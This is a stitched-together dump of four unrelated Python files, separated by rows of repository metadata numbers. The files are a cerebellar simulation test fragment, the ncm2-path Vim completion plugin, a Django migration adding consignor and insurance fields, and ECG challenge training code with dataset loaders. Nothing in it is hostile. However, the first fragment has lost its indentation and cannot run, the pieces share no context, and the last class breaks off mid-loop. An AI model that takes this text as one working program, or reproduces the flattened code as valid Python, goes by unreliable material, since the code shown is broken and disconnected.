redundant_patterns = sim.add_noise_patterns(test_patterns, prob=noise, n=512)
sim.evaluate(redundant_patterns, no_random=True)
acts = sim.get_mfs_activities()
# for act in acts[0:10]:
# print(act[0:20])
mf_dim = analysis.get_dim_from_acts(acts)
print(f'Dim MFs: {mf_dim}')
acts = sim.get_grc_activities()
# for act in acts[0:10]:
# print(act[0:20])
dim = analysis.get_dim_from_acts(acts)
print(f'Dim GRCs: {dim}')
pct_grc = int(dim*1000/sim.num_grcs)/10
pct_mfs = int(dim*1000/sim.num_mfs)/10
pct_mf_dim = int(dim*1000/mf_dim)/10
print(f' = {pct_mfs}% of MFs')
print(f' = {pct_mf_dim}% of MF dim')
print(f' = {pct_grc}% of GrCs')
measure_correlation_by_sharing(sim, acts, save_fname)
def test_dim_similar_input(
input_graph,
noise_probs,
seed=0,
):
removed = input_graph.remove_empty_mfs()
print(f'Removed {len(removed)} mfs')
random.seed(seed)
sim = Simulation(
input_graph=input_graph,
)
n_pattern = 1024*4 # 309
patterns = sim.generate_patterns(count=n_pattern)
# print(patterns); asdf
sim.evaluate(patterns, no_random=True,
calibrate_activation_level=.3)
test_patterns = [patterns[0]]
for noise in noise_probs:
print(f'noise={noise}')
redundant_patterns = sim.add_noise_patterns(test_patterns, prob=noise, n=512)
sim.evaluate(redundant_patterns, no_random=True)
acts = sim.get_mfs_activities()
# for act in acts[0:10]:
# print(act[0:20])
mf_dim = analysis.get_dim_from_acts(acts)
print(f'Dim MFs: {mf_dim}')
acts = sim.get_grc_activities()
# for act in acts[0:10]:
# print(act[0:20])
dim = analysis.get_dim_from_acts(acts)
print(f'Dim GRCs: {dim}')
pct_grc = int(dim*1000/sim.num_grcs)/10
pct_mfs = int(dim*1000/sim.num_mfs)/10
pct_mf_dim = int(dim*1000/mf_dim)/10
print(f' = {pct_mfs}% of MFs')
print(f' = {pct_mf_dim}% of MF dim')
print(f' = {pct_grc}% of GrCs')
def test_replicated_input(
n_mfs, n_grcs,
noise_probs,
seed=0,
):
random.seed(seed)
n_pattern = 1024*4 # 309
for noise in noise_probs:
print(f'noise={noise}')
test_patterns = generate_binary_patterns(n_mfs, count=1, f=.3)
# print(test_patterns[0][0])
redundant_patterns = add_noise_binary_patterns(test_patterns[0][0], prob=noise, n=512, f=.3)
# print(redundant_patterns)
# asdf
dim = analysis.get_dim_from_acts(redundant_patterns)
print(f'Dim GRCs: {dim}')
| 39.70068 | 136 | 0.634082 | 3,142 | 23,344 | 4.392425 | 0.064927 | 0.03565 | 0.043475 | 0.020868 | 0.806608 | 0.772553 | 0.757409 | 0.737121 | 0.727194 | 0.71973 | 0 | 0.024138 | 0.254626 | 23,344 | 587 | 137 | 39.768313 | 0.769023 | 0.098612 | 0 | 0.710472 | 0 | 0 | 0.107992 | 0.015128 | 0 | 0 | 0 | 0 | 0 | 1 | 0.024641 | false | 0 | 0.024641 | 0 | 0.063655 | 0.149897 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
dded211b3587db98f453247bcdae43cf3a11660c | 5,410 | py | Python | cache/dein/repos/github.com/ncm2/ncm2-path/pythonx/ncm2_path.py | leafwaltz/raven.nvim | 3cd443731cf22df42100b8bc52c19ff262aab0bf | [
"MIT"
] | 25 | 2018-08-14T02:58:36.000Z | 2021-10-30T12:31:13.000Z | cache/dein/repos/github.com/ncm2/ncm2-path/pythonx/ncm2_path.py | leafwaltz/raven.nvim | 3cd443731cf22df42100b8bc52c19ff262aab0bf | [
"MIT"
] | 8 | 2018-07-02T12:59:54.000Z | 2019-02-20T06:11:19.000Z | cache/dein/repos/github.com/ncm2/ncm2-path/pythonx/ncm2_path.py | leafwaltz/raven.nvim | 3cd443731cf22df42100b8bc52c19ff262aab0bf | [
"MIT"
] | 2 | 2018-07-02T12:54:34.000Z | 2019-02-20T04:43:27.000Z | # -*- coding: utf-8 -*-
import vim
from ncm2 import Ncm2Source, getLogger
import re
from os import path, listdir
logger = getLogger(__name__)
class BufPath(Ncm2Source):
def on_complete(self, ctx, path_pattern):
typed = ctx['typed']
filepath = ctx['filepath']
startccol = ctx['startccol']
base = ctx['base']
path_keyword = re.search(path_pattern + '$', typed).group(0)
dr = path.expandvars(path_keyword)
dr = path.expanduser(dr)
expanded = False
if dr != path_keyword:
expanded = True
dr = path.dirname(dr)
logger.debug('dir: %s', dr)
label = 'buf'
base_dir = path.dirname(filepath)
matcher = self.matcher_get(ctx['matcher'])
matches = []
joined_dir = path.join(base_dir, dr.strip('/'))
logger.debug('searching dir: %s', joined_dir)
try:
names = listdir(joined_dir)
names.sort(key=lambda name: name.lower())
logger.debug('search result: %s', names)
for name in names:
p = path.join(joined_dir, name)
word = path.basename(p)
menu = '~' + label
if expanded:
menu += '~ ' + p
m = dict(word=word, menu='~' + label)
if path.isdir(p):
m['kind'] = 'd'
else:
m['kind'] = 'f'
m = self.match_formalize(ctx, m)
if matcher(base, m):
matches.append(m)
except Exception as ex:
logger.exception('failed searching dir [%s]', joined_dir)
refresh = 0
if len(matches) > 100:
refresh = 1
matches = matches[0:100]
self.complete(ctx, startccol, matches, refresh)
class CwdPath(Ncm2Source):
def on_complete(self, ctx, path_pattern, cwd):
typed = ctx['typed']
startccol = ctx['startccol']
base = ctx['base']
path_keyword = re.search(path_pattern + '$', typed).group(0)
dr = path.expandvars(path_keyword)
dr = path.expanduser(dr)
expanded = False
if dr != path_keyword:
expanded = True
dr = path.dirname(dr)
logger.debug('dir: %s', dr)
label = 'cwd'
base_dir = cwd
matcher = self.matcher_get(ctx['matcher'])
matches = []
joined_dir = path.join(base_dir, dr.strip('/'))
logger.debug('searching dir: %s', joined_dir)
try:
names = listdir(joined_dir)
names.sort(key=lambda name: name.lower())
logger.debug('search result: %s', names)
for name in names:
p = path.join(joined_dir, name)
word = path.basename(p)
menu = '~' + label
if expanded:
menu += '~ ' + p
m = dict(word=word, menu='~' + label)
if path.isdir(p):
m['kind'] = 'd'
else:
m['kind'] = 'f'
m = self.match_formalize(ctx, m)
if matcher(base, m):
matches.append(m)
except Exception as ex:
logger.exception('failed searching dir [%s]', joined_dir)
refresh = 0
if len(matches) > 100:
refresh = 1
matches = matches[0:100]
self.complete(ctx, startccol, matches, refresh)
class RootPath(Ncm2Source):
def on_complete(self, ctx, path_pattern):
typed = ctx['typed']
filepath = ctx['filepath']
startccol = ctx['startccol']
base = ctx['base']
path_keyword = re.search(path_pattern + '$', typed).group(0)
dr = path.expandvars(path_keyword)
dr = path.expanduser(dr)
expanded = False
if dr != path_keyword:
expanded = True
dr = path.dirname(dr)
logger.debug('dir: %s', dr)
if not dr.startswith('/'):
return
menu = '~root'
if dr != path_keyword:
menu = dr
base_dir = '/'
matcher = self.matcher_get(ctx['matcher'])
matches = []
joined_dir = path.join(base_dir, dr)
logger.debug('searching dir: %s', joined_dir)
try:
names = listdir(joined_dir)
names.sort(key=lambda name: name.lower())
logger.debug('search result: %s', names)
for name in names:
p = path.join(joined_dir, name)
word = path.basename(p)
m = dict(word=word, menu=menu)
if path.isdir(p):
m['kind'] = 'd'
else:
m['kind'] = 'f'
m = self.match_formalize(ctx, m)
if matcher(base, m):
matches.append(m)
except Exception as ex:
logger.exception('failed searching dir [%s]', joined_dir)
refresh = 0
if len(matches) > 100:
refresh = 1
matches = matches[0:100]
self.complete(ctx, startccol, matches, refresh)
buf_path = BufPath(vim)
cwd_path = CwdPath(vim)
root_path = RootPath(vim)
on_complete_bufpath = buf_path.on_complete
on_complete_cwdpath = cwd_path.on_complete
on_complete_rootpath = root_path.on_complete
| 27.74359 | 69 | 0.509057 | 602 | 5,410 | 4.466777 | 0.149502 | 0.050205 | 0.029007 | 0.042395 | 0.866493 | 0.848643 | 0.842321 | 0.842321 | 0.827073 | 0.827073 | 0 | 0.010591 | 0.371719 | 5,410 | 194 | 70 | 27.886598 | 0.780524 | 0.003882 | 0 | 0.821918 | 0 | 0 | 0.064043 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.020548 | false | 0 | 0.027397 | 0 | 0.075342 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ddf6d566639991097878868b531c8c69c9c9a2fe | 5,000 | py | Python | web/transiq/team/migrations/0035_auto_20170628_2227.py | manibhushan05/transiq | 763fafb271ce07d13ac8ce575f2fee653cf39343 | [
"Apache-2.0"
] | null | null | null | web/transiq/team/migrations/0035_auto_20170628_2227.py | manibhushan05/transiq | 763fafb271ce07d13ac8ce575f2fee653cf39343 | [
"Apache-2.0"
] | 14 | 2020-06-05T23:06:45.000Z | 2022-03-12T00:00:18.000Z | web/transiq/team/migrations/0035_auto_20170628_2227.py | manibhushan05/transiq | 763fafb271ce07d13ac8ce575f2fee653cf39343 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-06-28 22:27
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('utils', '0005_aahooffice_branch_name'),
('team', '0034_nontransactionalexpense'),
]
operations = [
migrations.AddField(
model_name='lrnumber',
name='consignee_address',
field=models.CharField(blank=True, max_length=255, null=True),
),
migrations.AddField(
model_name='lrnumber',
name='consignee_city',
field=models.CharField(blank=True, max_length=255, null=True),
),
migrations.AddField(
model_name='lrnumber',
name='consignee_city_fk',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='lr_consignee_manual_full', to='utils.City'),
),
migrations.AddField(
model_name='lrnumber',
name='consignee_cst_tin',
field=models.CharField(blank=True, max_length=50, null=True),
),
migrations.AddField(
model_name='lrnumber',
name='consignee_name',
field=models.CharField(blank=True, max_length=255, null=True),
),
migrations.AddField(
model_name='lrnumber',
name='consignee_phone',
field=models.CharField(blank=True, max_length=255, null=True),
),
migrations.AddField(
model_name='lrnumber',
name='consignee_pin',
field=models.CharField(blank=True, max_length=255, null=True),
),
migrations.AddField(
model_name='lrnumber',
name='consignor_address',
field=models.CharField(blank=True, max_length=255, null=True),
),
migrations.AddField(
model_name='lrnumber',
name='consignor_city',
field=models.CharField(blank=True, max_length=255, null=True),
),
migrations.AddField(
model_name='lrnumber',
name='consignor_city_fk',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='lr_consignor_manual_full', to='utils.City'),
),
migrations.AddField(
model_name='lrnumber',
name='consignor_cst_tin',
field=models.CharField(blank=True, max_length=255, null=True),
),
migrations.AddField(
model_name='lrnumber',
name='consignor_name',
field=models.CharField(blank=True, max_length=255, null=True),
),
migrations.AddField(
model_name='lrnumber',
name='consignor_phone',
field=models.CharField(blank=True, max_length=255, null=True),
),
migrations.AddField(
model_name='lrnumber',
name='consignor_pin',
field=models.CharField(blank=True, max_length=255, null=True),
),
migrations.AddField(
model_name='lrnumber',
name='from_city',
field=models.CharField(blank=True, max_length=255, null=True),
),
migrations.AddField(
model_name='lrnumber',
name='insurance_date',
field=models.DateField(blank=True, null=True),
),
migrations.AddField(
model_name='lrnumber',
name='insurance_policy_number',
field=models.CharField(blank=True, max_length=200, null=True),
),
migrations.AddField(
model_name='lrnumber',
name='insurance_provider',
field=models.CharField(blank=True, max_length=200, null=True),
),
migrations.AddField(
model_name='lrnumber',
name='insurance_risk',
field=models.CharField(blank=True, max_length=200, null=True),
),
migrations.AddField(
model_name='lrnumber',
name='insured_amount',
field=models.DecimalField(blank=True, decimal_places=2, default=0, max_digits=30, null=True),
),
migrations.AddField(
model_name='lrnumber',
name='is_insured',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='lrnumber',
name='liability_of_service_tax',
field=models.CharField(blank=True, max_length=40, null=True),
),
migrations.AddField(
model_name='lrnumber',
name='to_city',
field=models.CharField(blank=True, max_length=255, null=True),
),
migrations.AddField(
model_name='lrnumber',
name='unloading_date',
field=models.DateField(blank=True, null=True),
),
]
| 36.231884 | 162 | 0.5822 | 504 | 5,000 | 5.589286 | 0.18254 | 0.153355 | 0.195953 | 0.230032 | 0.837771 | 0.837771 | 0.823926 | 0.787007 | 0.72737 | 0.666667 | 0 | 0.023097 | 0.2986 | 5,000 | 137 | 163 | 36.49635 | 0.780154 | 0.0136 | 0 | 0.692308 | 1 | 0 | 0.138973 | 0.030432 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.023077 | 0 | 0.046154 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
fb18d95d12f8696556803d6ee49e35f17de23c1f | 35,369 | py | Python | model_training/training.py | LanXiangExcavator/challenge2021_submission | 34d031e01d14d4f9bcdd1ac04b381b2340388cf0 | [
"BSD-2-Clause"
] | null | null | null | model_training/training.py | LanXiangExcavator/challenge2021_submission | 34d031e01d14d4f9bcdd1ac04b381b2340388cf0 | [
"BSD-2-Clause"
] | null | null | null | model_training/training.py | LanXiangExcavator/challenge2021_submission | 34d031e01d14d4f9bcdd1ac04b381b2340388cf0 | [
"BSD-2-Clause"
] | 1 | 2022-02-28T15:18:41.000Z | 2022-02-28T15:18:41.000Z | import torch
from torch.utils.data import DataLoader
from torch.utils.data.dataloader import default_collate
import numpy as np
import time
from model_training.utils import loadmat, CustomTensorDataset, load_weights, load_labels, resample, slide_and_cut, load_challenge_data
from model_training.util import my_find_challenge_files
import os
from utils.denoising import filter_and_detrend
from torchvision import datasets, transforms
import utils.transformers as module_transformers
from model_training.custom_dataset import CustomDataset4PeakDetection
# Challenge Dataloaders and Challenge metircs
class BaseDataLoader(DataLoader):
"""
Base class for all data loaders
"""
def __init__(self, train_dataset, val_dataset, test_dataset, batch_size, shuffle, num_workers,
collate_fn=default_collate, pin_memory=True):
self.train_dataset = train_dataset
self.val_dataset = val_dataset
self.test_dataset = test_dataset
self.batch_size = batch_size
self.batch_idx = 0
self.shuffle = shuffle
self.init_kwargs = {
'dataset': self.train_dataset,
'batch_size': batch_size,
'shuffle': self.shuffle,
'collate_fn': collate_fn,
'num_workers': num_workers,
'pin_memory': pin_memory,
'drop_last': True
}
super().__init__(**self.init_kwargs)
self.n_samples = len(self.train_dataset)
self.valid_data_loader_init_kwargs = {
'dataset': self.val_dataset,
'batch_size': batch_size,
'shuffle': self.shuffle,
'collate_fn': collate_fn,
'num_workers': num_workers,
'pin_memory': pin_memory,
'drop_last': True
}
self.valid_data_loader = DataLoader(**self.valid_data_loader_init_kwargs)
self.valid_data_loader.n_samples = len(self.val_dataset)
if self.test_dataset:
self.test_data_loader_init_kwargs = {
'dataset': self.test_dataset,
'batch_size': batch_size,
'shuffle': False,
'collate_fn': collate_fn,
'num_workers': num_workers,
'pin_memory': pin_memory,
'drop_last': True
}
self.test_data_loader = DataLoader(**self.test_data_loader_init_kwargs)
self.test_data_loader.n_samples = len(self.test_dataset)
class ChallengeDataset():
"""
challenge2020 data loading
"""
def __init__(self, label_dir, split_index, batch_size=128, shuffle=True, num_workers=0, resample_Fs=500, window_size=4992, n_segment=1,
normalization=False, training_size=None, augmentations=None, p=0.5, lead_number=12, save_data=False, load_saved_data=False):
self.label_dir = label_dir
self.dir2save_data = '/data/ecg/challenge2021/data/'
dir2save_data = '/data/ecg/challenge2021/data/'
start = time.time()
# Define the weights, the SNOMED CT code for the normal class, and equivalent SNOMED CT codes.
weights_file = 'weights.csv'
# Load the scored classes and the weights for the Challenge metric.
print('Loading weights...')
_, weights, indices = load_weights(weights_file)
classes = "164889003,164890007,6374002,426627000,733534002,713427006,270492004,713426002,39732003,445118002,164947007,251146004,111975006,698252002,426783006,63593006,10370003,365413008,427172004,164917005,47665007,427393009,426177001,427084000,164934002,59931005"
### equivalent SNOMED CT codes merged, noted as the larger one
classes = classes.split(',')
self.weights = weights
# Load the label and output files.
print('Loading label and output files...')
label_files = my_find_challenge_files(label_dir)
# label_files_tmp = []
# for f in label_files:
# fname = f.split('/')[-1].split('.')[0]
# if fname[0] == 'A' or fname[0] == 'E':
# continue
# label_files_tmp.append(f)
# label_files = label_files_tmp
labels_onehot = load_labels(label_files, classes)
split_idx = loadmat(split_index)
train_index, val_index = split_idx['train_index'], split_idx['val_index']
train_index = train_index.reshape((train_index.shape[1],))
if training_size is not None: # for test
train_index = train_index[0:training_size]
val_index = val_index.reshape((val_index.shape[1],))
# test_index = test_index.reshape((test_index.shape[1],))
num_files = len(label_files)
train_number = 0
val_number = 0
for i in range(num_files):
if i in train_index:
train_number += 1
elif i in val_index:
val_number += 1
print("train number: {}, val number: {}".format(train_number, val_number))
train_recordings = np.zeros((train_number, 12, window_size), dtype=float)
train_class_weights = np.zeros((train_number, 26,), dtype=float)
train_labels_onehot = np.zeros((train_number, 26,), dtype=float)
val_recordings = np.zeros((val_number, 12, window_size), dtype=float)
val_class_weights = np.zeros((val_number, 26,), dtype=float)
val_labels_onehot = np.zeros((val_number, 26,), dtype=float)
# file_names = list()
### class weights for datasets
# equivalent diagnose [['713427006', '59118001'], ['63593006', '284470004'], ['427172004', '17338001'], ['733534002', '164909002']]
# CPSC
CPSC_classes = ['270492004', '164889003', '733534002', '63593006', '426783006', '713427006'] # "59118001" = "713427006"
CPSC_class_weight = np.zeros((26,))
for cla in CPSC_classes:
CPSC_class_weight[classes.index(cla)] = 1
# CPSC_extra
CPSC_extra_excluded_classes = ['6374002', '39732003', '445118002', '251146004', '365413008',
'164947007', '365413008', '164947007', '698252002', '426783006',
'10370003', '111975006', '164917005', '47665007', '427393009',
'426177001', '164934002', '59931005']
CPSC_extra_class_weight = np.ones((26,))
for cla in CPSC_extra_excluded_classes:
CPSC_extra_class_weight[classes.index(cla)] = 0
# PTB-XL
PTB_XL_excluded_classes = ['6374002', '426627000', '365413008', '427172004'] # , '17338001'
PTB_XL_class_weight = np.ones((26,))
for cla in PTB_XL_excluded_classes:
PTB_XL_class_weight[classes.index(cla)] = 0
# G12ECG
G12ECG_excluded_classes = ['10370003', '365413008', '164947007']
G12ECG_class_weight = np.ones((26,))
for cla in G12ECG_excluded_classes:
G12ECG_class_weight[classes.index(cla)] = 0
# Chapman Shaoxing
Chapman_excluded_classes = ['6374002', '426627000', '713426002', '445118002', '10370003', '365413008', '427172004', '427393009', '427084000',
'63593006']
Chapman_class_weight = np.ones((26,))
for cla in Chapman_excluded_classes:
Chapman_class_weight[classes.index(cla)] = 0
# Ningbo
Ningbo_excluded_classes = ['164889003', '164890007', '426627000']
Ningbo_class_weight = np.ones((26,))
for cla in Ningbo_excluded_classes:
Ningbo_class_weight[classes.index(cla)] = 0
train_num = 0
val_num = 0
for i in range(num_files):
print('{}/{}'.format(i + 1, num_files))
recording, header, name = load_challenge_data(label_files[i], label_dir)
if name[0] == 'S' or name[0] == 'I': # filter PTB or St.P dataset
continue
elif name[0] == 'A': # CPSC
class_weight = CPSC_class_weight
elif name[0] == 'Q': # CPSC-extra
class_weight = CPSC_extra_class_weight
elif name[0] == 'H': # PTB-XL
class_weight = PTB_XL_class_weight
elif name[0] == 'E': # G12ECG
class_weight = G12ECG_class_weight
elif name[0] == 'J' and int(name[2:]) <= 10646: # Chapman
class_weight = Chapman_class_weight
elif name[0] == 'J' and int(name[2:]) > 10646: # Ningbo
class_weight = Ningbo_class_weight
else:
print('warning! not from one of the datasets: ', name)
continue
recording[np.isnan(recording)] = 0
# divide ADC_gain and resample
recording = resample(recording, header, resample_Fs)
# to filter and detrend samples
recording = filter_and_detrend(recording)
# slide and cut
recording = slide_and_cut(recording, n_segment, window_size, resample_Fs)
# file_names.append(name)
if i in train_index:
for j in range(recording.shape[0]): # segment number = 1 -> j=0
train_recordings[train_num] = recording[j]
train_labels_onehot[train_num] = labels_onehot[i]
train_class_weights[train_num] = class_weight
train_num += 1
elif i in val_index:
for j in range(recording.shape[0]):
val_recordings[val_num] = recording[j]
val_labels_onehot[val_num] = labels_onehot[i]
val_class_weights[val_num] = class_weight
val_num += 1
else:
pass
# # Normalization
# if normalization:
# train_recordings = self.normalization(train_recordings)
# val_recordings = self.normalization(val_recordings)
train_recordings = torch.from_numpy(train_recordings)
train_class_weights = torch.from_numpy(train_class_weights)
train_labels_onehot = torch.from_numpy(train_labels_onehot)
val_recordings = torch.from_numpy(val_recordings)
val_class_weights = torch.from_numpy(val_class_weights)
val_labels_onehot = torch.from_numpy(val_labels_onehot)
self.train_dataset = CustomTensorDataset(train_recordings, train_labels_onehot, train_class_weights)
self.val_dataset = CustomTensorDataset(val_recordings, val_labels_onehot, val_class_weights)
end = time.time()
print('time to get and process data: {}'.format(end - start))
class FineTuningDataset():
"""
challenge2020 data loading
"""
def __init__(self, label_dir, split_index, batch_size=128, shuffle=True, num_workers=0, resample_Fs=500, window_size=4992, n_segment=1,
normalization=False, training_size=None, augmentations=None, p=0.5, lead_number=12, save_data=False, load_saved_data=False):
self.label_dir = label_dir
self.dir2save_data = '/data/ecg/challenge2021/data/'
dir2save_data = '/data/ecg/challenge2021/data/'
start = time.time()
# Define the weights, the SNOMED CT code for the normal class, and equivalent SNOMED CT codes.
weights_file = 'weights.csv'
# Load the scored classes and the weights for the Challenge metric.
print('Loading weights...')
_, weights, indices = load_weights(weights_file)
classes = "164889003,164890007,6374002,426627000,733534002,713427006,270492004,713426002,39732003,445118002,164947007,251146004,111975006,698252002,426783006,63593006,10370003,365413008,427172004,164917005,47665007,427393009,426177001,427084000,164934002,59931005"
### equivalent SNOMED CT codes merged, noted as the larger one
classes = classes.split(',')
self.weights = weights
# Load the label and output files.
print('Loading label and output files...')
label_files = my_find_challenge_files(label_dir)
label_files_tmp = []
for f in label_files:
fname = f.split('/')[-1].split('.')[0]
if fname[0] == 'A' or fname[0] == 'E':
label_files_tmp.append(f)
label_files = label_files_tmp
labels_onehot = load_labels(label_files, classes)
split_idx = loadmat(split_index)
train_index, val_index = split_idx['train_index'], split_idx['val_index']
train_index = train_index.reshape((train_index.shape[1],))
if training_size is not None: # for test
train_index = train_index[0:training_size]
val_index = val_index.reshape((val_index.shape[1],))
# test_index = test_index.reshape((test_index.shape[1],))
num_files = len(label_files)
train_number = 0
val_number = 0
for i in range(num_files):
if i in train_index:
train_number += 1
elif i in val_index:
val_number += 1
print("train number: {}, val number: {}".format(train_number, val_number))
train_recordings = np.zeros((train_number, 12, window_size), dtype=float)
train_class_weights = np.zeros((train_number, 26,), dtype=float)
train_labels_onehot = np.zeros((train_number, 26,), dtype=float)
val_recordings = np.zeros((val_number, 12, window_size), dtype=float)
val_class_weights = np.zeros((val_number, 26,), dtype=float)
val_labels_onehot = np.zeros((val_number, 26,), dtype=float)
# file_names = list()
### class weights for datasets
# equivalent diagnose [['713427006', '59118001'], ['63593006', '284470004'], ['427172004', '17338001'], ['733534002', '164909002']]
# CPSC
CPSC_classes = ['270492004', '164889003', '733534002', '63593006', '426783006', '713427006'] # "59118001" = "713427006"
CPSC_class_weight = np.zeros((26,))
for cla in CPSC_classes:
CPSC_class_weight[classes.index(cla)] = 1
# CPSC_extra
CPSC_extra_excluded_classes = ['6374002', '39732003', '445118002', '251146004', '365413008',
'164947007', '365413008', '164947007', '698252002', '426783006',
'10370003', '111975006', '164917005', '47665007', '427393009',
'426177001', '164934002', '59931005']
CPSC_extra_class_weight = np.ones((26,))
for cla in CPSC_extra_excluded_classes:
CPSC_extra_class_weight[classes.index(cla)] = 0
# PTB-XL
PTB_XL_excluded_classes = ['6374002', '426627000', '365413008', '427172004'] # , '17338001'
PTB_XL_class_weight = np.ones((26,))
for cla in PTB_XL_excluded_classes:
PTB_XL_class_weight[classes.index(cla)] = 0
# G12ECG
G12ECG_excluded_classes = ['10370003', '365413008', '164947007']
G12ECG_class_weight = np.ones((26,))
for cla in G12ECG_excluded_classes:
G12ECG_class_weight[classes.index(cla)] = 0
# Chapman Shaoxing
Chapman_excluded_classes = ['6374002', '426627000', '713426002', '445118002', '10370003', '365413008', '427172004', '427393009', '427084000',
'63593006']
Chapman_class_weight = np.ones((26,))
for cla in Chapman_excluded_classes:
Chapman_class_weight[classes.index(cla)] = 0
# Ningbo
Ningbo_excluded_classes = ['164889003', '164890007', '426627000']
Ningbo_class_weight = np.ones((26,))
for cla in Ningbo_excluded_classes:
Ningbo_class_weight[classes.index(cla)] = 0
train_num = 0
val_num = 0
for i in range(num_files):
print('{}/{}'.format(i + 1, num_files))
recording, header, name = load_challenge_data(label_files[i], label_dir)
if name[0] == 'S' or name[0] == 'I': # filter PTB or St.P dataset
continue
elif name[0] == 'A': # CPSC
class_weight = CPSC_class_weight
elif name[0] == 'Q': # CPSC-extra
class_weight = CPSC_extra_class_weight
elif name[0] == 'H': # PTB-XL
class_weight = PTB_XL_class_weight
elif name[0] == 'E': # G12ECG
class_weight = G12ECG_class_weight
elif name[0] == 'J' and int(name[2:]) <= 10646: # Chapman
class_weight = Chapman_class_weight
elif name[0] == 'J' and int(name[2:]) > 10646: # Ningbo
class_weight = Ningbo_class_weight
else:
print('warning! not from one of the datasets: ', name)
continue
recording[np.isnan(recording)] = 0
# divide ADC_gain and resample
recording = resample(recording, header, resample_Fs)
# to filter and detrend samples
recording = filter_and_detrend(recording)
# slide and cut
recording = slide_and_cut(recording, n_segment, window_size, resample_Fs)
# file_names.append(name)
if i in train_index:
for j in range(recording.shape[0]): # segment number = 1 -> j=0
train_recordings[train_num] = recording[j]
train_labels_onehot[train_num] = labels_onehot[i]
train_class_weights[train_num] = class_weight
train_num += 1
elif i in val_index:
for j in range(recording.shape[0]):
val_recordings[val_num] = recording[j]
val_labels_onehot[val_num] = labels_onehot[i]
val_class_weights[val_num] = class_weight
val_num += 1
else:
pass
train_recordings = torch.from_numpy(train_recordings)
train_class_weights = torch.from_numpy(train_class_weights)
train_labels_onehot = torch.from_numpy(train_labels_onehot)
val_recordings = torch.from_numpy(val_recordings)
val_class_weights = torch.from_numpy(val_class_weights)
val_labels_onehot = torch.from_numpy(val_labels_onehot)
self.train_dataset = CustomTensorDataset(train_recordings, train_labels_onehot, train_class_weights)
self.val_dataset = CustomTensorDataset(val_recordings, val_labels_onehot, val_class_weights)
end = time.time()
print('time to get and process data: {}'.format(end - start))
class Domain_Dataset():
"""
challenge2020 data loading
"""
def __init__(self, label_dir, split_index, batch_size=128, shuffle=True, num_workers=0, resample_Fs=500, window_size=4992, n_segment=1,
normalization=False, training_size=None, augmentations=None, p=0.5, lead_number=12, save_data=False, load_saved_data=False):
self.label_dir = label_dir
self.dir2save_data = '/data/ecg/challenge2021/data/'
dir2save_data = '/data/ecg/challenge2021/data/'
start = time.time()
# Define the weights, the SNOMED CT code for the normal class, and equivalent SNOMED CT codes.
weights_file = 'weights.csv'
# Load the scored classes and the weights for the Challenge metric.
print('Loading weights...')
_, weights, indices = load_weights(weights_file)
classes = "164889003,164890007,6374002,426627000,733534002,713427006,270492004,713426002,39732003,445118002,164947007,251146004,111975006,698252002,426783006,63593006,10370003,365413008,427172004,164917005,47665007,427393009,426177001,427084000,164934002,59931005"
### equivalent SNOMED CT codes merged, noted as the larger one
classes = classes.split(',')
self.weights = weights
# Load the label and output files.
print('Loading label and output files...')
label_files = my_find_challenge_files(label_dir)
label_files_tmp = []
for f in label_files:
fname = f.split('/')[-1].split('.')[0]
if fname[0] == 'A' or fname[0] == 'E':
label_files_tmp.append(f)
label_files = label_files_tmp
split_idx = loadmat(split_index)
train_index, val_index = split_idx['train_index'], split_idx['val_index']
train_index = train_index.reshape((train_index.shape[1],))
if training_size is not None: # for test
train_index = train_index[0:training_size]
val_index = val_index.reshape((val_index.shape[1],))
# test_index = test_index.reshape((test_index.shape[1],))
num_files = len(label_files)
train_number = 0
val_number = 0
for i in range(num_files):
if i in train_index:
train_number += 1
elif i in val_index:
val_number += 1
print("train number: {}, val number: {}".format(train_number, val_number))
train_recordings = np.zeros((train_number, 12, window_size), dtype=float)
train_class_weights = np.zeros((train_number, 2,), dtype=float)
train_labels_onehot = np.zeros((train_number, 2,), dtype=float)
val_recordings = np.zeros((val_number, 12, window_size), dtype=float)
val_class_weights = np.zeros((val_number, 2,), dtype=float)
val_labels_onehot = np.zeros((val_number, 2,), dtype=float)
train_num = 0
val_num = 0
for i in range(num_files):
print('{}/{}'.format(i + 1, num_files))
recording, header, name = load_challenge_data(label_files[i], label_dir)
if name[0] == 'A': # CPSC
dataset_label = np.array([1, 0])
class_weight = np.array([1, 1])
elif name[0] == 'E': # G12ECG
dataset_label = np.array([0, 1])
class_weight = np.array([1, 1])
else:
print('warning! not from one of the datasets: ', name)
continue
recording[np.isnan(recording)] = 0
# divide ADC_gain and resample
recording = resample(recording, header, resample_Fs)
# to filter and detrend samples
recording = filter_and_detrend(recording)
# slide and cut
recording = slide_and_cut(recording, n_segment, window_size, resample_Fs)
# file_names.append(name)
if i in train_index:
for j in range(recording.shape[0]): # segment number = 1 -> j=0
train_recordings[train_num] = recording[j]
train_labels_onehot[train_num] = dataset_label
train_class_weights[train_num] = class_weight
train_num += 1
elif i in val_index:
for j in range(recording.shape[0]):
val_recordings[val_num] = recording[j]
val_labels_onehot[val_num] = dataset_label
val_class_weights[val_num] = class_weight
val_num += 1
else:
pass
